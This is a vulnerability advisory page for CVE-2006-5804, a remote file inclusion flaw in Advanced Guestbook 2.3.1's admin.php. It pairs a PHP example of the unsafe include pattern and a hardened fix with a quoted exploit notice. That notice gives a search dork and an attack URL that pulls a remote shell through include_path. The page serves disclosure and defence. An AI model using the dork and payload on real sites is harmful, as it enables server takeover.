Advanced Guestbook admin.php PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1192929    Vulnerability type: Input validation
Published: 2006-11-08    Updated: 2006-11-14
CVE ID: CVE-2006-5804    CNNVD ID: CNNVD-200611-141
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006110036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-141
|Vulnerability details
Advanced Guestbook's admin.php contains a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code by supplying a URL in the include_path parameter.
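The following is an added illustration of the bug class described above, written for this page; it is not Advanced Guestbook's actual admin.php code, and the file names, allowlist keys and default path are hypothetical. It shows the unsafe pattern (a request parameter used directly as an include prefix) beside a hardened form that maps the parameter onto a fixed allowlist and verifies the resolved file stays inside the application directory.

```php
<?php
// UNSAFE pattern (hypothetical reconstruction of the bug class, not the real code):
// the include prefix is taken straight from the request and handed to include().
// On PHP configurations that permit URL includes (allow_url_fopen before PHP 5.2,
// allow_url_include from 5.2 on), a URL in include_path makes PHP fetch and run
// remote code.
function load_vulnerable(array $get): void
{
    $include_path = $get['include_path'] ?? './lib';   // hypothetical default
    include $include_path . '/config.php';             // attacker controls the prefix
}

// HARDENED form: the request may only select a key from a fixed allowlist, and the
// resolved file must still live beneath the application's own directory.
function load_hardened(array $get): void
{
    $allowed = [                                       // hypothetical names
        'default' => __DIR__ . '/lib',
        'legacy'  => __DIR__ . '/lib/legacy',
    ];
    $key = $get['include_path'] ?? 'default';
    if (!array_key_exists($key, $allowed)) {
        http_response_code(400);
        exit('invalid include_path');
    }

    // realpath() returns false for missing files and collapses "../" segments,
    // so a successful prefix check guarantees the file is inside __DIR__.
    $file = realpath($allowed[$key] . '/config.php');
    $base = __DIR__ . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $base, strlen($base)) !== 0) {
        http_response_code(400);
        exit('invalid include_path');
    }
    include $file;
}

// Defence in depth, independent of application code (php.ini):
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; if the application does not need URL streams
```

Logging requests whose include_path value contains a URL scheme (for example http:// or ftp://) gives a simple detection signal for attempts against the unpatched version.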
|Exploit
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Author : BrokeN-ProXy
Script : admin.php
Found  : www.hotscripts.com
Risk   : Dangerous
Dork   : "powered by: Advanced Guestbook 2.3.1"

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Exploit:

www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd

Notice:

[AGuest Path] may be more than one; you are advised to use the direct result of the search.

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

GreestZ: 
nEt^DeViL[ My Best friend ] .:.  RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:.  Red Devils Crew[ |Màstr ]  .:. PROHacker  .:. Devil-00 .:. Red_Casper  .:.  ReMoTeR  .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh  .:. Team-Evil [ X-BLooD-X ]  .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in:
www.3asfh.net/vb/
www.lezr.com/vb/

broken-proxy[at]Linuxmail[dot]org
|References

Source: BID
Name: 20902
Link: http://www.securityfocus.com/bid/20902
Source: BUGTRAQ
Name: 20061103 Advanced Guestbook 2.3.1 (Admin.php) Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/450729/100/0/threaded
Source: SECUNIA
Name: 22756
Link: http://secunia.com/advisories/22756
Source: OSVDB
Name: 30230
Link: http://www.osvdb.org/30230
Source: VUPEN
Name: ADV-2006-4385
Link: http://www.frsirt.com/english/advisories/2006/4385
Source: SREASON
Name: 1833
Link: http://securityreason.com/securityalert/1833